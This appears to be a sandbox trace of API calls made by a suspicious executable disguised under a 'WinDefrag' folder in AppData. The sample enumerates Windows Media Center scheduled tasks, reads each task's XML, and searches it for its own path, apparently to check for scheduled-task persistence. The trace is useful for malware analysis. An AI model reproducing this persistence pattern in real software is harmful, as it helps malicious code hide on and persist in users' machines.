IRegisteredTaskCollection:get_Item (in: This=0x3280f0, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x5, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328240) returned 0x0 [0169.575] IRegisteredTask:get_Name (in: This=0x328240, pName=0x18e230 | out: pName=0x18e230*="InstallPlayReady") returned 0x0 [0169.575] IRegisteredTask:get_Xml (in: This=0x328240, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\InstallPlayReady\r\n 2008-02-08T15:02:27.7076832\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-25)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)\r\n \r\n \r\n false\r\n false\r\n false\r\n Parallel\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /InstallPlayReady $(Arg0)\r\n \r\n \r\n") returned 0x0 [0169.578] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\InstallPlayReady\r\n 2008-02-08T15:02:27.7076832\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-25)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)\r\n \r\n \r\n false\r\n false\r\n false\r\n Parallel\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /InstallPlayReady $(Arg0)\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.578] IUnknown:Release (This=0x328240) returned 0x0 [0169.578] IRegisteredTaskCollection:get_Item (in: This=0x3280f0, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x6, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328240) returned 0x0 [0169.578] IRegisteredTask:get_Name (in: This=0x328240, pName=0x18e230 | out: pName=0x18e230*="mcupdate") returned 0x0 [0169.578] IRegisteredTask:get_Xml (in: This=0x328240, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\mcupdate\r\n 1982-01-15T16:30:00-08:00\r\n $(@%systemRoot%\\ehome\\ehres.dll,-125)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-126)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n \r\n S-1-5-20\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n Parallel\r\n false\r\n true\r\n true\r\n true\r\n false\r\n false\r\n true\r\n 6\r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\mcupdate\r\n $(Arg0)\r\n \r\n \r\n") returned 0x0 [0169.580] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\mcupdate\r\n 1982-01-15T16:30:00-08:00\r\n $(@%systemRoot%\\ehome\\ehres.dll,-125)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-126)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n \r\n S-1-5-20\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n Parallel\r\n false\r\n true\r\n true\r\n true\r\n false\r\n false\r\n true\r\n 6\r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\mcupdate\r\n $(Arg0)\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.581] IUnknown:Release (This=0x328240) returned 0x0 [0169.581] IRegisteredTaskCollection:get_Item (in: This=0x3280f0, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x7, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328240) returned 0x0 [0169.581] IRegisteredTask:get_Name (in: This=0x328240, pName=0x18e230 | out: pName=0x18e230*="MediaCenterRecoveryTask") returned 0x0 [0169.581] IRegisteredTask:get_Xml (in: This=0x328240, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\MediaCenterRecoveryTask\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehres.dll,-137)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-138)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\mcupdate.exe\r\n -MediaCenterRecoveryTask\r\n \r\n \r\n {23E5D772-327A-42f5-BDEE-C65C6796BB2A}\r\n \r\n \r\n \r\n") returned 0x0 [0169.583] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\MediaCenterRecoveryTask\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehres.dll,-137)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-138)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\mcupdate.exe\r\n -MediaCenterRecoveryTask\r\n \r\n \r\n {23E5D772-327A-42f5-BDEE-C65C6796BB2A}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.584] IUnknown:Release (This=0x328240) returned 0x0 [0169.584] IRegisteredTaskCollection:get_Item (in: This=0x3280f0, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x8, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328240) returned 0x0 [0169.584] IRegisteredTask:get_Name (in: This=0x328240, pName=0x18e230 | out: pName=0x18e230*="ObjectStoreRecoveryTask") returned 0x0 [0169.584] IRegisteredTask:get_Xml (in: This=0x328240, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\ObjectStoreRecoveryTask\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehres.dll,-131)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-132)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-20\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\mcupdate.exe\r\n -ObjectStoreRecoveryTask\r\n \r\n \r\n {177AFECE-9599-46cf-90D7-68EC9EEB27B4}\r\n \r\n \r\n \r\n") returned 0x0 [0169.586] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\ObjectStoreRecoveryTask\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehres.dll,-131)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-132)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-20\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\mcupdate.exe\r\n -ObjectStoreRecoveryTask\r\n \r\n \r\n {177AFECE-9599-46cf-90D7-68EC9EEB27B4}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.586] IUnknown:Release (This=0x328240) returned 0x0 [0169.586] IRegisteredTaskCollection:get_Item (in: This=0x3280f0, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x9, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328240) returned 0x0 [0169.587] IRegisteredTask:get_Name (in: This=0x328240, pName=0x18e230 | out: pName=0x18e230*="OCURActivate") returned 0x0 [0169.587] IRegisteredTask:get_Xml (in: This=0x328240, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\OCURActivate\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-11)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /OCURActivate\r\n \r\n \r\n") returned 0x0 [0169.589] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\OCURActivate\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-11)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /OCURActivate\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.589] IUnknown:Release (This=0x328240) returned 0x0 [0169.589] IRegisteredTaskCollection:get_Item (in: This=0x3280f0, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xa, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328240) returned 0x0 [0169.589] IRegisteredTask:get_Name (in: This=0x328240, pName=0x18e230 | out: pName=0x18e230*="OCURDiscovery") returned 0x0 [0169.589] IRegisteredTask:get_Xml (in: This=0x328240, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\OCURDiscovery\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-10)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;NS)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /OCURDiscovery $(Arg0)\r\n \r\n \r\n") returned 0x0 [0169.592] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\OCURDiscovery\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-10)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;NS)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /OCURDiscovery $(Arg0)\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.592] IUnknown:Release (This=0x328240) returned 0x0 [0169.592] IRegisteredTaskCollection:get_Item (in: This=0x3280f0, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xb, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328240) returned 0x0 [0169.592] IRegisteredTask:get_Name (in: This=0x328240, pName=0x18e230 | out: pName=0x18e230*="PBDADiscovery") returned 0x0 [0169.592] IRegisteredTask:get_Xml (in: This=0x328240, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\PBDADiscovery\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-10)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;NS)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /PBDADiscovery\r\n \r\n \r\n") returned 0x0 [0169.595] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\PBDADiscovery\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-10)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;NS)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /PBDADiscovery\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.595] IUnknown:Release (This=0x328240) returned 0x0 [0169.595] IRegisteredTaskCollection:get_Item (in: This=0x3280f0, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xc, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328240) returned 0x0 [0169.595] IRegisteredTask:get_Name (in: This=0x328240, pName=0x18e230 | out: pName=0x18e230*="PBDADiscoveryW1") returned 0x0 [0169.595] IRegisteredTask:get_Xml (in: This=0x328240, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\PBDADiscoveryW1\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-10)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;NS)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n true\r\n false\r\n true\r\n false\r\n false\r\n false\r\n PT1H\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /wait:7 /PBDADiscovery\r\n \r\n \r\n") returned 0x0 [0169.597] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\PBDADiscoveryW1\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-10)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;NS)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n true\r\n false\r\n true\r\n false\r\n false\r\n false\r\n PT1H\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /wait:7 /PBDADiscovery\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.598] IUnknown:Release (This=0x328240) returned 0x0 [0169.598] IRegisteredTaskCollection:get_Item (in: This=0x3280f0, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xd, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328240) returned 0x0 [0169.598] IRegisteredTask:get_Name (in: This=0x328240, pName=0x18e230 | out: pName=0x18e230*="PBDADiscoveryW2") returned 0x0 [0169.598] IRegisteredTask:get_Xml (in: This=0x328240, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\PBDADiscoveryW2\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-10)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;NS)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n true\r\n false\r\n true\r\n false\r\n false\r\n false\r\n PT1H\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /wait:90 /PBDADiscovery\r\n \r\n \r\n") returned 0x0 [0169.600] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\PBDADiscoveryW2\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-10)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;NS)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n true\r\n false\r\n true\r\n false\r\n false\r\n false\r\n PT1H\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /wait:90 /PBDADiscovery\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.601] IUnknown:Release (This=0x328240) returned 0x0 [0169.601] IRegisteredTaskCollection:get_Item (in: This=0x3280f0, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xe, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328240) returned 0x0 [0169.601] IRegisteredTask:get_Name (in: This=0x328240, pName=0x18e230 | out: pName=0x18e230*="PeriodicScanRetry") returned 0x0 [0169.601] IRegisteredTask:get_Xml (in: This=0x328240, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n $(@%systemRoot%\\ehome\\ehrecvr.exe,-104)\r\n 2008-07-06T05:40:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehrecvr.exe,-103)\r\n \\Microsoft\\Windows\\Media Center\\PeriodicScanRetry\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n \r\n 2006-09-09T17:33:00\r\n false\r\n \r\n \r\n \r\n \r\n S-1-5-20\r\n LeastPrivilege\r\n InteractiveToken\r\n \r\n \r\n \r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n false\r\n true\r\n false\r\n false\r\n false\r\n false\r\n true\r\n false\r\n PT72H\r\n \r\n \r\n \r\n %windir%\\ehome\\MCUpdate.exe\r\n -pscn 0\r\n \r\n \r\n") returned 0x0 [0169.603] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemRoot%\\ehome\\ehrecvr.exe,-104)\r\n 2008-07-06T05:40:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehrecvr.exe,-103)\r\n \\Microsoft\\Windows\\Media Center\\PeriodicScanRetry\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n \r\n 2006-09-09T17:33:00\r\n false\r\n \r\n \r\n \r\n \r\n S-1-5-20\r\n LeastPrivilege\r\n InteractiveToken\r\n \r\n \r\n \r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n false\r\n true\r\n false\r\n false\r\n false\r\n false\r\n true\r\n false\r\n PT72H\r\n \r\n \r\n \r\n %windir%\\ehome\\MCUpdate.exe\r\n -pscn 0\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.604] IUnknown:Release (This=0x328240) returned 0x0 [0169.604] IRegisteredTaskCollection:get_Item (in: This=0x3280f0, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xf, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328240) returned 0x0 [0169.604] IRegisteredTask:get_Name (in: This=0x328240, pName=0x18e230 | out: pName=0x18e230*="PvrRecoveryTask") returned 0x0 [0169.604] IRegisteredTask:get_Xml (in: This=0x328240, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\PvrRecoveryTask\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehres.dll,-129)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-130)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-20\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\mcupdate.exe\r\n -PvrRecoveryTask\r\n \r\n \r\n {7FA3A1C3-3C87-40DE-AC16-B6E2815A4CC8}\r\n \r\n \r\n \r\n") returned 0x0 [0169.606] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\PvrRecoveryTask\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehres.dll,-129)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-130)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-20\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\mcupdate.exe\r\n -PvrRecoveryTask\r\n \r\n \r\n {7FA3A1C3-3C87-40DE-AC16-B6E2815A4CC8}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.607] IUnknown:Release (This=0x328240) returned 0x0 [0169.607] IRegisteredTaskCollection:get_Item (in: This=0x3280f0, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x10, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328240) returned 0x0 [0169.607] IRegisteredTask:get_Name (in: This=0x328240, pName=0x18e230 | out: pName=0x18e230*="PvrScheduleTask") returned 0x0 [0169.607] IRegisteredTask:get_Xml (in: This=0x328240, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\PvrScheduleTask\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehres.dll,-135)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-136)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-20\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\mcupdate.exe\r\n -PvrSchedule\r\n \r\n \r\n {CEF51277-5358-477b-858C-4E14F0C80BF7}\r\n \r\n \r\n \r\n") returned 0x0 [0169.609] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\PvrScheduleTask\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehres.dll,-135)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-136)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-20\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\mcupdate.exe\r\n -PvrSchedule\r\n \r\n \r\n {CEF51277-5358-477b-858C-4E14F0C80BF7}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.610] IUnknown:Release (This=0x328240) returned 0x0 [0169.610] IRegisteredTaskCollection:get_Item (in: This=0x3280f0, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x11, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328240) returned 0x0 [0169.610] IRegisteredTask:get_Name (in: This=0x328240, pName=0x18e230 | out: pName=0x18e230*="RecordingRestart") returned 0x0 [0169.610] IRegisteredTask:get_Xml (in: This=0x328240, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\RecordingRestart\r\n 1982-01-15T16:30:00-08:00\r\n $(@%systemRoot%\\ehome\\ehres.dll,-127)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-128)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n \r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-20\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n false\r\n Parallel\r\n false\r\n true\r\n true\r\n true\r\n false\r\n false\r\n true\r\n 6\r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehrec\r\n /RestartRecording\r\n \r\n \r\n") returned 0x0 [0169.612] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\RecordingRestart\r\n 1982-01-15T16:30:00-08:00\r\n $(@%systemRoot%\\ehome\\ehres.dll,-127)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-128)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n \r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-20\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n false\r\n Parallel\r\n false\r\n true\r\n true\r\n true\r\n false\r\n false\r\n true\r\n 6\r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehrec\r\n /RestartRecording\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.612] IUnknown:Release 